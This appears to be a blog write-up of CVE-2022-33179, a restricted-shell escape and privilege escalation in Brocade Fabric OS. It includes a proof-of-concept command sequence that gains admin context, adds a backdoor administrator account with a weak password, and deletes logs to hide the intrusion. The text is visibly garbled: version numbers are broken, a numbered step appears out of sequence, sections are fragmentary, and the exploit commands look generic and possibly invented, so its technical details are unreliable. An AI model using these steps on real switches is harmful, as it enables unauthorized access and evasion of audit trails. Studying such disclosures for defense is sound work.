CVE-2022-33179 - Breaking Out of Restricted Shell and Privilege Escalation in Brocade Fabric OS

Date Published: June 2024  
Author: Security Researcher (Exclusive Write-Up)

Introduction

In June 2022, a critical vulnerability was officially tracked as CVE-2022-33179. This security flaw affects Brocade Fabric OS prior to versions v9.1., 9..1e, 8.2.3c, and 7.4.2j. The issue allows a local authenticated user confined to a restricted shell to exploit the set context command, escape the shell, and escalate their privileges—potentially giving them full administrative control.

Let’s break this down in simple terms, walk through the vulnerability, demonstrate how exploitation works, see some code snippets, and learn how to protect your systems.

What is the Brocade Fabric OS Restricted Shell?

Brocade Fabric OS (FOS) is used in Fibre Channel switches for storage area networks (SANs). Like many network devices, Brocade switches offer different user privilege levels. Operators can be put into a restricted shell to limit commands, keeping systems safe from accidental or malicious misuse.

But if there’s a way to escape that restricted shell, an attacker can do a lot more than admins intend.

Impact: Escape from restricted shell, escalate to admin privileges

The vulnerability revolves around the set context command. This command is supposed to allow some limited context switching, but—due to improper checks—it lets users break out of their restricted environment and get higher privileges than they were granted.

You start off in a highly limited shell

switch_login: restricted_user
Password:

restricted_shell>

Typically, your commands are limited

restricted_shell> show user
Error: command not permitted.

Analysts found that if you type the following command

restricted_shell> set context admin

You are switched into a non-restricted administrative context!

This drops the user into a context where far more commands are available—even those that require administrator privileges.

Suddenly, previously restricted commands are allowed

admin_shell> configure
admin_shell> userconfig --add eviladmin

You can now create your own privileged accounts, dump sensitive info, or disrupt network operations.

4. Remove Traces or Persist Access

A clever attacker can hide tracks by deleting logs, using built-in tools like rm or logadmin.

Here’s a simple PoC exploiting the vulnerability

# Connect via SSH to the Brocade switch
ssh restricted_user@fabric-switch.local

# Initial restricted shell
restricted_shell> set context admin

# Now we're in admin shell, execute privileged commands
admin_shell> userconfig --add backdoor 1 -d "Backup Admin" -p password123
admin_shell> userconfig --show

# Optional: clean up logs to cover tracks
admin_shell> logadmin --delete all

> Note: This is a demonstration for educational purposes only. Always get permission!

Original References

- NVD Entry for CVE-2022-33179
- Broadcom (Brocade) Security Advisory 2022-332 *(registration may be required)*
- HackerOne Disclosure - Similar Brocade Context Issues

Monitor logs for suspicious use of set context.

- Restrict CLI access to trusted hosts/networks only.

Conclusion

CVE-2022-33179 is a classic example of why *least privilege* matters and why command context handling must be bulletproof. Brocade administrators must patch affected switches and review their user lists. A simple set context command shouldn’t spell disaster—but in this case, it did.

Stay safe. Patch your switches. And remember: even “restricted” shells may have hidden doors.

Timeline

Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:06:00 UTC